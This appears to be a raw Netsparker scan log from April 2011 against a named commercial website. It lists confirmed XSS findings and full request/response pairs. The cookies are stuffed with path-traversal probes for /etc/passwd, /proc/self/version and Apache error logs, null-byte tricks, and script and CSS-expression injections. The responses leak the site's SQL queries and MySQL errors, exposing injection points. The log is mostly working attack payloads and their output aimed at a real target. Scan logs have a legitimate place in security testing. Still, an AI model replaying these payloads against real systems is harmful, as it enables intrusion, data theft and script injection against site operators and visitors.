OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=98saapfvnjvbuimvufvtisrpo5; path=/
Content-Length: 2913
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E

/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x001474)</script>

Request

GET /ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001474)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/images/Employ_girl.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=koe091mbq7jnsei3833l2nntq5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x001474)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E

/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
catId GET 20001
group GET wede00
template GET 3
URI-BASED Raw URI '"--></style></script><script>alert(0x001435)</script>

Request

GET /ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001435)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ujmaj23j0448b33o50orvg40n0; path=/
Content-Length: 3203
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x001435)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E

/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x001460)</script>

Request

GET /ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001460)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=10EE3C024CDA7B812FDA17514DAD67F9; OAID=796794e69a8753089a41044ffcc41718; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2228%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A51%3A%22http%3A%2F%2Fwww.insideup.com%2Fcompetitivecomparision.html%22%3B%7D; PHPSESSID=clomsmsqh2pged90sbte0bi9i7
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
